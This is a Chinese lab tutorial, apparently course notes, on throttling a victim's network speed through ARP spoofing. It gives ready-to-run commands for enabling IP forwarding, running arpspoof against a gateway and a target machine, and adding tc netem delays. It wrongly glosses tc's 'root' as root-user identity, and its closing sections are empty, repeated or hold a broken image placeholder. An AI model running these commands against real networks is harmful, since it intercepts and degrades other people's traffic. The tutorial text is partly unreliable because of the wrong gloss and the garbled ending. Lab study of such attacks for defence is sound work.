ARP限制网速攻击

大家没想到吧，ARP还能限制对方网速。当kali欺骗了网关和受害者的时候，受害者访问网络就需要经过kali的网卡，那我们限制kali网卡的速度或者转发的速度就可以限制对方的网速。这里可以使用的工具有tc、iptables、WonderShaper等等，我们以tc为例，tc是通过限制网卡的速度来限制对方的，是一种杀敌一千自损八百的手段。

1.TC工具介绍

在Linux中，流量控制都是通过TC这个工具来完成的。通常， 要对网卡进行流量控制的配置，需要进行如下的步骤:

◆ 为网卡配置一个队列;

◆ 在该队列上建立分类;

◆ 根据需要建立子队列和子分类;

◆ 为每个分类建立过滤器。

需要注意的是， 在TC 中使用下列的缩写表示相应的网络延迟:

时间的计量单位：

s、sec或者secs 秒

ms、msec或者msecs 毫秒

us、usec、usecs或者一个无单位数字 微秒

QDisc(排队规则) [qdɪsk]是queueing discipline [ˈkjuːɪŋ] [ˈdɪsəplɪn] 的简写，它是理解流量控制(traffic control)的基础。无论何时，内核如果需要通过某个网络接口发送数据包，它都需要按照为这个接口配置的qdisc(排队规则)把数据包加入队列。然后，内核会尽可能多地从qdisc里面取出数据包，把它们交给网络适配器驱动模块。

2.TC命令介绍

1.限制网速200ms延时

tc qdisc add dev eth0 root netem delay 200ms
参数：
qdisc：排队规则
add:添加
dev：设备（网卡）
root：root用户身份
netem delay：设置网络延时时间

2.取消限制网速200ms延时

tc qdisc del dev eth0 root netem delay 200ms
参数：
qdisc：排队规则
del:删除
dev：设备（网卡）
root：root用户身份
netem delay：设置网络延时时间

3.修改网络延时

tc qdisc change  dev eth0 root netem delay 300ms
参数：
qdisc：排队规则
change:修改
dev：设备（网卡）
root：root用户身份
netem delay：设置网络延时时间

3.ARP攻击限制网速的具体步骤

1.开启端口转发

cat /proc/sys/net/ipv4/ip_forward 	        #值为0表示没开启流量转发，为1表示开启了
echo 1 > /proc/sys/net/ipv4/ip_forward     #开启流量转发

2.开启ARP攻击

arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.11

3.查看靶机当前的网速

https://www.speedtest.cn/

4.开启网络延迟限速

tc qdisc add dev eth0 root netem delay 500ms

5.查看限速规则

tc qdisc show

6.查看靶机当前的网速

https://www.speedtest.cn/

7.修改网速限制

tc qdisc change dev eth0 root netem delay 800ms

8.查看限速规则

tc qdisc show

9.查看靶机当前的网速

https://www.speedtest.cn/

10.取消限速

tc qdisc del dev eth0 root netem delay 800ms

11.查看限速规则

tc qdisc show

12.查看靶机当前的网速

https://www.speedtest.cn/

4.限速原理讲解

5.课堂小结

请参考：ARP限制网速攻击-课后笔记.xmind

靶机当前的网速

https://www.speedtest.cn/

4.限速原理讲解

[外链图片转存中…(img-ZFAbO9ro-1728807766587)]

5.课堂小结